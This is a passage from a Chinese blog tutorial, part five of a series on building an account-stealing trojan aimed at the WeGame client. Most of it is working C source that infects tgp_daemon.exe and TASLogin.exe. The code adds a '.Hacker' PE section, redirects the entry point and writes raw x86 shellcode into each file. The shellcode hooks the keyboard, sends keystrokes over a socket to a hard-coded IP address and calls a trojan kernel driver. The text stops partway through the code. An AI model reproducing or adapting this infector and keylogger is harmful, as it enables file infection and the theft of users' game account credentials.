盗号木马之旅(五)

最新推荐文章于 2023-02-01 18:50:29 发布
最新推荐文章于 2023-02-01 18:50:29 发布
阅读量1k 收藏 7
点赞数 1
文章标签: 木马 盗号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36760780/article/details/81667352
版权

目标:

      实现把我们在  WeGame盗号木马之旅(三) 中实现的机器码注入到目标EXE中,并修改相关结构。即完成InfectiveVirus.exe。

 

实现:

      下面上一张图,形象的解释我们怎么感染目标EXE:

      首先我们打开目标EXE,CreateFile,读到内存。

 然后在内存修改相关PE结构参数和注入代码:

最后写回覆盖原来的EXE即可:

 打开和写回很简单,就是一般的文件操作而已。关键在于怎么修改PE结构。具体细节请读者参考这几篇文章(http://www.cnblogs.com/wumac/p/5272846.html)(https://www.cnblogs.com/wumac/p/5274559.html)。读者需要有相关PE结构知识才行。下面简单说明一下我们需要改什么:

      一、新建一个节,我把他取名.Hacker,同时设置一下里面的一些数据

      二、修改PE头中节的数量

      三、修改ImageSize大小,即PE文件加到内存以后的大小

      四、修改入口点地址

      五、尾部开辟0X2000大小的空间放机器码和参数

 

下面上代码:

#define WIN32_LEAN_AND_MEAN
#include<windows.h>
#include<tchar.h>
#include<stdio.h>
#include<Winsock2.h>

#pragma comment(lib,"WS2_32.lib")

char cBuffer[48] = { 0 };//0
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//
WCHAR pLinkName[] = L"\\\\.\\TROJAN_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450


//注入代码(tgp_daemon.exe)
char shellcode[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x57,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x57,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x57,
	0x00,0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x57,0x00,
	0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x57,0x00,0x8B,
	0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x57,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x57,0x00,0x8B,0x35,0x68,0x13,
	0x57,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x57,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x57,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x57,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x57,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x57,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x57,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x57,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x57,0x00,0x8B,0x05,0x80,
	0x13,0x57,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x57,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x57,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x57,0x00,0x8B,0x1D,0x80,0x13,0x57,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x57,0x00,0x8B,0x1D,0x84,0x13,0x57,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x57,0x00,0x68,0x30,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,0x57,
	0x00,0x89,0x05,0x6C,0x13,0x57,0x00,0x68,0x60,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,
	0x57,0x00,0x89,0x05,0x70,0x13,0x57,0x00,0x68,0xF0,0x10,0x57,0x00,0xFF,0x35,0x68,
	0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x88,0x13,0x57,0x00,0x68,
	0x20,0x11,0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,
	0x89,0x05,0x8C,0x13,0x57,0x00,0x68,0x50,0x11,0x57,0x00,0xFF,0x35,0x68,0x13,0x57,
	0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x90,0x13,0x57,0x00,0x68,0x80,0x11,
	0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,
	0x94,0x13,0x57,0x00,0x68,0xB0,0x11,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,
	0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x98,0x13,0x57,0x00,0x68,0xE0,0x11,0x57,0x00,
	0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x9C,0x13,
	0x57,0x00,0x68,0x10,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,
	0x13,0x57,0x00,0x89,0x05,0xA0,0x13,0x57,0x00,0x68,0x70,0x12,0x57,0x00,0xFF,0x35,
	0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xA4,0x13,0x57,0x00,
	0x68,0xA0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,
	0x00,0x89,0x05,0xA8,0x13,0x57,0x00,0x68,0xD0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,
	0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xAC,0x13,0x57,0x00,0x68,0x00,
	0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,
	0x05,0xB0,0x13,0x57,0x00,0x68,0x30,0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,
	0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xB4,0x13,0x57,0x00,0xFF,0x15,0x88,0x13,
	0x57,0x00,0x50,0x6A,0x00,0x68,0x00,0x03,0x57,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,
	0x57,0x00,0xE9,0x21,0xAA,0xF0,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x57,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x57,
	0x00,0x50,0x68,0xC0,0x03,0x57,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x57,
	0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,0x13,0x57,0x00,
	0xFF,0x15,0x94,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x0C,0x00,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x57,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x57,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0A,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x57,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x57,0x00,0xFF,0x15,0xA4,0x13,0x57,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x57,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x57,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x57,
	0x00,0xFF,0x15,0xB4,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00
};
//注入代码(TASLogin.exe)
char shellcode2[] = {
	0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
	0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
	0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
	0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
	0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
	0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
	0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
	0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
	0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
	0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
	0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
	0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
	0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
	0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
	0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
	0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
	0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
	0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
	0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
	0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
	0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
	0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
	0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
	0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
	0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
	0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
	0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
	0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
	0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
	0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
	0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
	0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
	0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
	0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
	0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
	0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
	0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
	0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
	0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
	0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
	0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
	0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
	0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
	0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
	0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
	0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
	0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
	0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
	0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
	0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
	0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
	0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
	0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
	0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
	0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
	0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
	0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
	0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
	0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
	0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
	0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
	0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
	0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
	0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
	0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
	0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
	0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};


typedef struct RemoteParameter
{
	char c[18][48];
	DWORD p[22];
	char cc[3][48];
	DWORD pp[3];
};

void main() {
	TCHAR* fileName[2];
	fileName[0] = _T("F:\\WeGame\\tgp_daemon.exe");
	fileName[1] = _T("F:\\WeGame\\tenprotect\\TASLogin.exe");
	//fileName[0] = _T("C:\\Users\\a\\Desktop\\WeGame\\tgp_daemon.exe");
	//fileName[1] = _T("C:\\Users\\a\\Desktop\\WeGame\\tenprotect\\TASLogin.exe");
	for (int i = 0; i < 2; i++) {
		DWORD dwApplySize = 0x2000;//需要开辟的代码和参数空间大小
		HANDLE hFile = CreateFile(fileName[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, 0);
		if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
			printf("无法打开文件!");
			return;
		}
		DWORD dwFileSize = GetFileSize(hFile, NULL);
		if (dwFileSize == 0xffffffff) {
			printf("读取文件大小失败!");
			CloseHandle(hFile);
			return;
		}
		LPVOID pFileMem = GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, dwFileSize + dwApplySize);//开辟新的内存
		if (pFileMem == NULL) {
			printf("开辟内存失败!");
			CloseHandle(hFile);
			return;
		}
		DWORD dwReadFactSize = 0;
		BOOL bRead = ReadFile(hFile, pFileMem, dwFileSize, &dwReadFactSize, NULL);
		if (!bRead || dwReadFactSize != dwFileSize) {
			printf("文件载入内存出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		//设置新的节
		PIMAGE_NT_HEADERS pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pFileMem + ((PIMAGE_DOS_HEADER)pFileMem)->e_lfanew);
		PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PBYTE)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);
		int iSectionNum = pPeHeader->FileHeader.NumberOfSections;//原来的节数目
		IMAGE_SECTION_HEADER addSectionHeader;//新的节
		addSectionHeader.Name[0] = '.';
		addSectionHeader.Name[1] = 'H';
		addSectionHeader.Name[2] = 'a';
		addSectionHeader.Name[3] = 'c';
		addSectionHeader.Name[4] = 'k';
		addSectionHeader.Name[5] = 'e';
		addSectionHeader.Name[6] = 'r';
		addSectionHeader.Name[7] = '\0';//设置节的名字
		addSectionHeader.Misc.VirtualSize = dwApplySize;//节的虚拟内存大小
		addSectionHeader.VirtualAddress = pPeHeader->OptionalHeader.SizeOfImage;//虚拟地址起点
		addSectionHeader.SizeOfRawData = dwApplySize;//节的文件内大小
		addSectionHeader.PointerToRawData = pSectionHeader[iSectionNum - 1].PointerToRawData + pSectionHeader[iSectionNum - 1].SizeOfRawData;//文件地址起点
		addSectionHeader.PointerToRelocations = 0;//这些参数不重要
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.NumberOfRelocations = 0;
		addSectionHeader.PointerToLinenumbers = 0;
		addSectionHeader.Characteristics = 0xF000000F;//设置这片内存的属性,需要有执行代码和读写的权限才行
		memcpy((PBYTE)(&pSectionHeader[iSectionNum - 1]) + sizeof(IMAGE_SECTION_HEADER), (PBYTE)&addSectionHeader, sizeof(IMAGE_SECTION_HEADER));
		pPeHeader->FileHeader.NumberOfSections++;//增加节的数目
		pPeHeader->OptionalHeader.DllCharacteristics = 0x0000;
		pPeHeader->OptionalHeader.AddressOfEntryPoint = pPeHeader->OptionalHeader.SizeOfImage;//设置新的入口点
		pPeHeader->OptionalHeader.SizeOfImage += 0x2000;//增加总的内存文件大小0x2000
		//初始化参数,参数即需要在我们代码里面使用的一些字符串和用来保存的变量
		struct RemoteParameter remoteParameter;
		memset(&remoteParameter, 0, sizeof(remoteParameter));
		memcpy(remoteParameter.c[1], pUser32, strlen(pUser32));
		memcpy(remoteParameter.c[2], pWS2_32, strlen(pWS2_32));
		memcpy(remoteParameter.c[3], pLoadLibrary, strlen(pLoadLibrary));
		memcpy(remoteParameter.c[4], pGetProcAddress, strlen(pGetProcAddress));
		memcpy(remoteParameter.c[5], pGetCurrentThreadId, strlen(pGetCurrentThreadId));
		memcpy(remoteParameter.c[6], pSetWindowsHookEx, strlen(pSetWindowsHookEx));
		memcpy(remoteParameter.c[7], pCreateThread, strlen(pCreateThread));
		memcpy(remoteParameter.c[8], pCallNextHookEx, strlen(pCallNextHookEx));
		memcpy(remoteParameter.c[9], pWSAStartup, strlen(pWSAStartup));
		memcpy(remoteParameter.c[10], psocket, strlen(psocket));
		memcpy(remoteParameter.c[11], phtons, strlen(phtons));
		memcpy(remoteParameter.c[12], pIP, strlen(pIP));
		memcpy(remoteParameter.c[13], pinet_addr, strlen(pinet_addr));
		memcpy(remoteParameter.c[14], pconnect, strlen(pconnect));
		memcpy(remoteParameter.c[15], psend, strlen(psend));
		memcpy(remoteParameter.c[16], pclosesocket, strlen(pclosesocket));
		memcpy(remoteParameter.c[17], pWSACleanup, strlen(pWSACleanup));
		memcpy(remoteParameter.cc[0], pLinkName, sizeof(pLinkName));
		memcpy(remoteParameter.cc[1], pCreateFile, sizeof(pCreateFile));
		memcpy(remoteParameter.cc[2], pDeviceIoControl, sizeof(pDeviceIoControl));
		//把参数结构体写入目标EXE文件
		memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData + 0x1000, (PBYTE)&remoteParameter, sizeof(remoteParameter));
		//把注入的机器码(注入代码)写入目标EXE
		if (i == 0) {
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode, sizeof(shellcode));//注入到tgp_daemon.exe
		}
		else
		{
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode2, sizeof(shellcode2));//注入到TASLogin.exe
		}
		//生成感染的程序,把修改后的文件从内存中取出写入原来文件地址,覆盖原来目标EXE文件
		DWORD dwWriteFact = 0;
		DWORD dwPointer = SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
